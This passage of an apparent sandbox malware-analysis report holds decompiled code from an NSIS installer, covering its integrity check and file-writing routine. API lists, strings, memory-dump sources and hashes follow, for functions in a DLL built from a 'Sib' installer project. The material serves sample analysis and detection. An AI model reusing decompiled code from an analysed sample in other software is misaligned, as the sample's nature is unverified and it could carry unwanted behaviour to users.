					__eflags = _t65;
					if(_t65 == 0) {
						goto L36;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L36;
					}
					goto L28;
				} else {
					do {
						asm("sbb eax, eax");
						_t70 = ( ~( *0x47eb0c) & 0x00007e00) + 0x200;
						_t90 = _t93;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403336(0x42c178, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E004032D2(1);
							L36:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x47eb0c;
						if( *0x47eb0c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E004032D2(0);
							}
							goto L20;
						}
						E00405E38( &_v44, 0x42c178, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x42c174; // 0x550f8
						 *0x47eb80 =  *0x47eb80 | _a4 & 0x00000002;
						_t80 = _v20;
						 *0x47eb0c = _t87;
						__eflags = _t80 - _t93;
						if(_t80 > _t93) {
							goto L36;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a264
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x43dd38; // 0x474792
						if(__eflags < 0) {
							_v12 = E004072AD(_v12, 0x42c178, _t90);
						}
						 *0x42c174 =  *0x42c174 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}






























                                                                                                                                                    0x004035bb
                                                                                                                                                    0x004035be
                                                                                                                                                    0x004035c1
                                                                                                                                                    0x004035db
                                                                                                                                                    0x004035e0
                                                                                                                                                    0x004035f3
                                                                                                                                                    0x004035f5
                                                                                                                                                    0x004035f8
                                                                                                                                                    0x00403601
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403603
                                                                                                                                                    0x00403614
                                                                                                                                                    0x00403625
                                                                                                                                                    0x0040362c
                                                                                                                                                    0x00403632
                                                                                                                                                    0x00403637
                                                                                                                                                    0x00403639
                                                                                                                                                    0x0040363b
                                                                                                                                                    0x00403728
                                                                                                                                                    0x0040372a
                                                                                                                                                    0x00403730
                                                                                                                                                    0x00403736
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040373c
                                                                                                                                                    0x0040373f
                                                                                                                                                    0x0040376b
                                                                                                                                                    0x00403770
                                                                                                                                                    0x00403776
                                                                                                                                                    0x00403781
                                                                                                                                                    0x0040378d
                                                                                                                                                    0x00403792
                                                                                                                                                    0x00403795
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403797
                                                                                                                                                    0x0040379b
                                                                                                                                                    0x004037a3
                                                                                                                                                    0x004037a8
                                                                                                                                                    0x004037aa
                                                                                                                                                    0x004037aa
                                                                                                                                                    0x004037aa
                                                                                                                                                    0x004037b2
                                                                                                                                                    0x004037b3
                                                                                                                                                    0x004037b3
                                                                                                                                                    0x004037b6
                                                                                                                                                    0x004037b6
                                                                                                                                                    0x004037b9
                                                                                                                                                    0x004037bb
                                                                                                                                                    0x004037bc
                                                                                                                                                    0x004037bc
                                                                                                                                                    0x004037c7
                                                                                                                                                    0x004037cd
                                                                                                                                                    0x004037db
                                                                                                                                                    0x004037e0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004037e0
                                                                                                                                                    0x00403747
                                                                                                                                                    0x00403752
                                                                                                                                                    0x00403757
                                                                                                                                                    0x00403759
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403762
                                                                                                                                                    0x00403765
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403641
                                                                                                                                                    0x00403646
                                                                                                                                                    0x0040364d
                                                                                                                                                    0x00403654
                                                                                                                                                    0x00403659
                                                                                                                                                    0x0040365b
                                                                                                                                                    0x0040365d
                                                                                                                                                    0x0040365f
                                                                                                                                                    0x0040365f
                                                                                                                                                    0x00403663
                                                                                                                                                    0x00403668
                                                                                                                                                    0x0040366a
                                                                                                                                                    0x004037eb
                                                                                                                                                    0x004037f1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004037f1
                                                                                                                                                    0x00403670
                                                                                                                                                    0x00403677
                                                                                                                                                    0x004036f3
                                                                                                                                                    0x004036f7
                                                                                                                                                    0x004036fb
                                                                                                                                                    0x00403700
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004036f7
                                                                                                                                                    0x00403680
                                                                                                                                                    0x00403685
                                                                                                                                                    0x00403688
                                                                                                                                                    0x0040368d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040368f
                                                                                                                                                    0x00403696
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403698
                                                                                                                                                    0x0040369f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004036a1
                                                                                                                                                    0x004036a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004036aa
                                                                                                                                                    0x004036b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004036b3
                                                                                                                                                    0x004036b9
                                                                                                                                                    0x004036c2
                                                                                                                                                    0x004036c8
                                                                                                                                                    0x004036cb
                                                                                                                                                    0x004036d1
                                                                                                                                                    0x004036d3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004036d9
                                                                                                                                                    0x004036dd
                                                                                                                                                    0x004036e5
                                                                                                                                                    0x004036e5
                                                                                                                                                    0x004036e8
                                                                                                                                                    0x004036e8
                                                                                                                                                    0x004036eb
                                                                                                                                                    0x004036ed
                                                                                                                                                    0x004036ef
                                                                                                                                                    0x004036ef
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004036ed
                                                                                                                                                    0x004036df
                                                                                                                                                    0x004036e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403701
                                                                                                                                                    0x00403701
                                                                                                                                                    0x00403707
                                                                                                                                                    0x00403713
                                                                                                                                                    0x00403713
                                                                                                                                                    0x00403716
                                                                                                                                                    0x0040371c
                                                                                                                                                    0x0040371e
                                                                                                                                                    0x0040371e
                                                                                                                                                    0x00403726
                                                                                                                                                    0x00403726
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403726

                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                    Strings
                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                    • API String ID: 4283519449-527102705
                                                                                                                                                    • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                    • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040337F, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E0040337F(int _a4, void* _a8, long _a12, int _a16) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				short _v156;
				void* _t66;
				void* _t68;
				long _t73;
				intOrPtr _t78;
				long _t79;
				void* _t81;
				int _t83;
				void* _t93;
				void* _t100;
				long _t101;
				int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t93 = _a12;
				_t102 = _a16;
				_v12 = _t102;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t93;
				if(_t93 == 0) {
					_v16 = 0x424170;
				}
				_t64 = _a4;
				if(_a4 >= 0) {
					E00403368( *0x47eaf8 + _t64);
				}
				_t66 = E00403336( &_a16, 4); // executed
				if(_t66 != 0) {
					if((_a16 & 0x80000000) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E00403336(0x420170, _t103) == 0) {
									goto L7;
								}
								if(WriteFile(_a8, 0x420170, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
									L31:
									_push(0xfffffffe);
									goto L8;
								} else {
									_v8 = _v8 + _t103;
									_a16 = _a16 - _t103;
									continue;
								}
							}
							L37:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403336(_t93, _t102) == 0) {
							goto L7;
						} else {
							_v8 = _t102;
							goto L37;
						}
					}
					_t73 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t73;
					 *0x43dd30 = 0x435d28;
					 *0x43dd2c = 0x435d28;
					 *0x434188 = 8;
					 *0x4346a4 = 0;
					 *0x4346a0 = 0;
					 *0x43dd28 = 0x43dd28;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L37;
					} else {
						goto L11;
					}
					while(1) {
						L11:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403336(0x420170, _t104) == 0) {
							goto L7;
						}
						_a16 = _a16 - _t104;
						 *0x434178 = 0x420170;
						 *0x43417c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x434180 = _t100;
							 *0x434184 = _v12;
							_t78 = E004076A0(0x434178);
							_v24 = _t78;
							if(_t78 < 0) {
								break;
							}
							_t105 =  *0x434180; // 0x425ad2
							_t106 = _t105 - _t100;
							_t79 = GetTickCount();
							_t101 = _t79;
							if(( *0x47eb94 & 0x00000001) != 0 && (_t79 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v156, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404F9E(0,  &_v156);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L11;
								}
								goto L37;
							} else {
								if(_a12 != 0) {
									_t81 =  *0x434180; // 0x425ad2
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t81;
									L26:
									if(_v24 != 1) {
										continue;
									}
									goto L37;
								}
								_t83 = WriteFile(_a8, _v16, _t106,  &_v28, 0); // executed
								if(_t83 == 0 || _v28 != _t106) {
									goto L31;
								} else {
									_v8 = _v8 + _t106;
									goto L26;
								}
							}
						}
						_push(0xfffffffc);
						goto L8;
					}
					goto L7;
				} else {
					L7:
					_push(0xfffffffd);
					L8:
					_pop(_t68);
					return _t68;
				}
			}


























                                                                                                                                                    0x00403389
                                                                                                                                                    0x0040338d
                                                                                                                                                    0x00403393
                                                                                                                                                    0x00403398
                                                                                                                                                    0x0040339a
                                                                                                                                                    0x0040339a
                                                                                                                                                    0x004033a1
                                                                                                                                                    0x004033a4
                                                                                                                                                    0x004033a9
                                                                                                                                                    0x004033ab
                                                                                                                                                    0x004033ab
                                                                                                                                                    0x004033b2
                                                                                                                                                    0x004033b7
                                                                                                                                                    0x004033c2
                                                                                                                                                    0x004033c2
                                                                                                                                                    0x004033cd
                                                                                                                                                    0x004033d4
                                                                                                                                                    0x004033e5
                                                                                                                                                    0x00403548
                                                                                                                                                    0x004035ac
                                                                                                                                                    0x0040356e
                                                                                                                                                    0x00403574
                                                                                                                                                    0x00403576
                                                                                                                                                    0x00403576
                                                                                                                                                    0x00403587
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040359f
                                                                                                                                                    0x0040353f
                                                                                                                                                    0x0040353f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004035a6
                                                                                                                                                    0x004035a6
                                                                                                                                                    0x004035a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004035a9
                                                                                                                                                    0x0040359f
                                                                                                                                                    0x00403564
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403564
                                                                                                                                                    0x0040354d
                                                                                                                                                    0x0040354f
                                                                                                                                                    0x0040354f
                                                                                                                                                    0x0040355b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403561
                                                                                                                                                    0x00403561
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403561
                                                                                                                                                    0x0040355b
                                                                                                                                                    0x004033f1
                                                                                                                                                    0x004033f3
                                                                                                                                                    0x004033f3
                                                                                                                                                    0x004033fa
                                                                                                                                                    0x00403402
                                                                                                                                                    0x00403407
                                                                                                                                                    0x0040340f
                                                                                                                                                    0x00403419
                                                                                                                                                    0x0040341f
                                                                                                                                                    0x00403425
                                                                                                                                                    0x0040342f
                                                                                                                                                    0x00403432
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403438
                                                                                                                                                    0x00403438
                                                                                                                                                    0x00403438
                                                                                                                                                    0x00403440
                                                                                                                                                    0x00403442
                                                                                                                                                    0x00403442
                                                                                                                                                    0x00403453
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403455
                                                                                                                                                    0x00403458
                                                                                                                                                    0x0040345e
                                                                                                                                                    0x00403464
                                                                                                                                                    0x00403467
                                                                                                                                                    0x0040346f
                                                                                                                                                    0x00403475
                                                                                                                                                    0x0040347a
                                                                                                                                                    0x0040347f
                                                                                                                                                    0x00403484
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040348a
                                                                                                                                                    0x00403490
                                                                                                                                                    0x00403492
                                                                                                                                                    0x0040349b
                                                                                                                                                    0x0040349d
                                                                                                                                                    0x004034ce
                                                                                                                                                    0x004034d4
                                                                                                                                                    0x004034e0
                                                                                                                                                    0x004034e5
                                                                                                                                                    0x004034e5
                                                                                                                                                    0x004034ec
                                                                                                                                                    0x00403530
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004034ee
                                                                                                                                                    0x004034f1
                                                                                                                                                    0x00403513
                                                                                                                                                    0x00403518
                                                                                                                                                    0x0040351b
                                                                                                                                                    0x0040351e
                                                                                                                                                    0x00403521
                                                                                                                                                    0x00403525
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040352b
                                                                                                                                                    0x004034ff
                                                                                                                                                    0x00403507
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040350e
                                                                                                                                                    0x0040350e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040350e
                                                                                                                                                    0x00403507
                                                                                                                                                    0x004034ec
                                                                                                                                                    0x00403538
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00403538
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004033d6
                                                                                                                                                    0x004033d6
                                                                                                                                                    0x004033d6
                                                                                                                                                    0x004033d8
                                                                                                                                                    0x004033d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004033d8

                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00425AD2,00403792,00000000), ref: 004034FF
                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                    • String ID: (]C$... %d%%$pAB
                                                                                                                                                    • API String ID: 651206458-3635341587
                                                                                                                                                    • Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                    • Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E629B60, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 168memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 6E629B9A
                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6E629BD8
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6E629C35
                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6E629C6A
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 6E629CD4
                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6E629D0E
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629C8A
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629D30
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp, xrefs: 6E629BE4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$AllocFree$Base::Concurrency::details::ContextIdentityQueueWork
                                                                                                                                                    • String ID: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\Sibl\ClrHost.cpp
                                                                                                                                                    • API String ID: 3803223067-4145850606
                                                                                                                                                    • Opcode ID: 4f13fdd761513f536cace766bd3c0a7e806ca223f6f0a4e41b5769996c37d1ef
                                                                                                                                                    • Instruction ID: 03b6cb8b95f19534c9593e2794044fd74fbc37182a2770846f74e83db9ade865
                                                                                                                                                    • Opcode Fuzzy Hash: 4f13fdd761513f536cace766bd3c0a7e806ca223f6f0a4e41b5769996c37d1ef
                                                                                                                                                    • Instruction Fuzzy Hash: 2471C3B1E00609DFCB04DFE4D984BEEBBB5BF49314F108628E515A7290D775AA41CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E623780, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 157memoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62381A
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E62385D
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E6238A9
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E623937
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,AddActionResult,00000000,00000000,00000000,00000000,00000000,?), ref: 6E623945
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorDebugHeap$DeleteFile
                                                                                                                                                    • String ID: Action failed$AddActionResult$Condition failed$Condition failed
                                                                                                                                                    • API String ID: 1100692808-2694484580
                                                                                                                                                    • Opcode ID: cd176602ef2246cc1c9644bc5d53edcfce683e66cc276c4fe80f8b103b530a4d
                                                                                                                                                    • Instruction ID: 4f441c89ee0aaad83f89628461ed08db9d9e1b641d1031cf2ccd1c1de662911a
                                                                                                                                                    • Opcode Fuzzy Hash: cd176602ef2246cc1c9644bc5d53edcfce683e66cc276c4fe80f8b103b530a4d
                                                                                                                                                    • Instruction Fuzzy Hash: 07510E71A5010A9FCB08DFD9DC64AFFB379BF85318F004929E5166B294DB34A900CF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E677BE2, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 373timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$InformationTimeZone
                                                                                                                                                    • String ID: Pacific Daylight Time$Pacific Standard Time
                                                                                                                                                    • API String ID: 597776487-1154798116
                                                                                                                                                    • Opcode ID: 2bbe22234ef49496c7f1504685c5e74a59a1ee9cecce7015de66dc98ddec8141
                                                                                                                                                    • Instruction ID: f674b195e7aedaaa8d41bf2fffe34edeaba8e5d4e62d03212da9b8edaf79cb86
                                                                                                                                                    • Opcode Fuzzy Hash: 2bbe22234ef49496c7f1504685c5e74a59a1ee9cecce7015de66dc98ddec8141
                                                                                                                                                    • Instruction Fuzzy Hash: A7C1E171914206AFDF308FF9C850AEA7BBDEF47355F24485AE490972D1EB30AA41CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E623BD0, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,3920FDCC), ref: 6E623C5B
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E623CF3
                                                                                                                                                      • Part of subcall function 6E625840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6E62584A
                                                                                                                                                    Strings
                                                                                                                                                    • %s\%s, xrefs: 6E623DE8
                                                                                                                                                    • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6E623D82
                                                                                                                                                    • |ohn, xrefs: 6E623D03
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorBase::Concurrency::details::ContextDebugFileHeapIdentityModuleNameQueueWork
                                                                                                                                                    • String ID: %s\%s$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$|ohn
                                                                                                                                                    • API String ID: 1128770468-3145947659
                                                                                                                                                    • Opcode ID: edbcba64d70cd69c707e3e4d0f99e84f03f2edb4d78bc8486e2955263b6f9ceb
                                                                                                                                                    • Instruction ID: 9c28d08930a62f97824e2c019f6044f802937a12a373bdfd8047aad4bbd74989
                                                                                                                                                    • Opcode Fuzzy Hash: edbcba64d70cd69c707e3e4d0f99e84f03f2edb4d78bc8486e2955263b6f9ceb
